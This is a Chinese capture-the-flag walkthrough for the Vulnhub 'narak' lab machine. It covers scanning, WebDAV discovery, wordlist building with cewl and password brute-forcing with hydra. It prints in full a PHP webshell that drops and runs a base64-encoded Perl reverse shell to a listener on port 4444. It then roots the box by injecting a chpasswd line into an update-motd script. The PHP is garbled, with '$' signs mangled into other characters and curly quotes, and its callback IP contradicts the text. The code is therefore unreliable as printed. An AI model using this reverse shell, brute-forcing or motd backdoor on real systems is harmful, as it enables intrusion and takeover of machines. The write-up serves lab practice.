narak靶机

narak靶机

vulnhub下载靶机和kali一起设置为nat模式

ifconfig查询本机IP地址

nmap扫描本机网段查看靶机地址

查看源代码后什么也没发现

使用dirb工具-基于字典的目录扫描工具

dirb扫一下目录

使用方法：dirb http://192.168.10.138/

发现webdav服务

我们搜索webdav服务

WebDAV 基于 HTTP 协议的通信协议，在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法，使应用程序可对Web Server直接读写，并支持写文件锁定(Locking)及解锁(Unlock)，还可以支持文件的版本控制。

常用的文件共享有三种：FTP、Samba、WebDAV，它们各有优缺点，了解后才能更好地根据自己的需求选择方案。

那此时我们通过webdav进入网站发现需要用户密码

因为没有任何提示我们用户密码的东西，所有我们采用密码爆破的方式，使用kali自带的字典生成工具cewl获取网站后台数据从而生成字典。

使用方法 cewl http://192.168.10.138 -w dict.txt

#dict.txt是生成文件的名字。

之后用hydra工具使用字典爆破靶机

(-L 指定用户名 -P 指定密码 http-get 请求方式)

爆破出密码用户后登录

我们上传一个shell文件

反弹shell端口号和ip地址改成本机的

<?php function which(\(pr) { \)path = execute(“which \(pr"); return (\)path ? \(path : \)pr); } function execute(\(cfe) { \)res = “; if (\(cfe) { if(function_exists('exec')) { @exec(\)cfe,\(res); \)res = join(”\n”,\(res); } elseif(function_exists('shell_exec')) { \)res = @shell_exec(\(cfe); } elseif(function_exists('system')) { @ob_start(); @system(\)cfe); \(res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru(\)cfe); \(res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource(\)f = @popen(\(cfe,"r"))) { \)res = “; while(!@feof(\(f)) { \)res .= @fread(\(f,1024); } @pclose(\)f); } } return \(res; } function cf(\)fname,\(text){ if(\)fp=@fopen(\(fname,'w')) { @fputs(\)fp,@base64_decode(\(text)); @fclose(\)fp); } } \(yourip = "192.168.10.138"; \)yourport = ‘4444’; \(usedb = array('perl'=>'perl','c'=>'c'); \)back_connect=“IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj”. “aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR”. “hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT”. “sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI”. “kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi”. “KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl”. “OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==”; cf(‘/tmp/.bc’,\(back_connect); \)res = execute(which(‘perl’).” /tmp/.bc \(yourip \)yourport &“); ?>

用cadaver工具连接webdav以便上传我们的shell文件

进入webdav后我们打开：

open http://192.168.10.138/webdav

我们要把shell文件放在网站根目录下后再put webshell.php

之后nc -lvvp 4444监听4444端口查看监听情况

在根目录下发现可疑mnt目录打开获得一串字符

--[—–>+<]>-–.+++++.+.+++++++++++.–.+++[->+++<]>++.++++++.–[—>+<]>--.—–.++++.

解码网站：https://www.splitbrain.org/services/ook

得到一组brainfuck编码，解码后得到：

chitragupt

在home目录下发现了 inferno，narak用户

ssh连接登录inferno试试，解码的chitragupt作为密码登录找到user.txt文件发现flag

修改文件 /etc/update-motd.d/00-header 1.进入到文件夹 /etc/update-motd.d/ 2.修改文件 echo “echo ‘root:admin’|sudo chpasswd”>>00-header 3.重新登录 \4. 切换管理员

之后 su root切换管理员权限时，密码就是admin

root目录中找到flag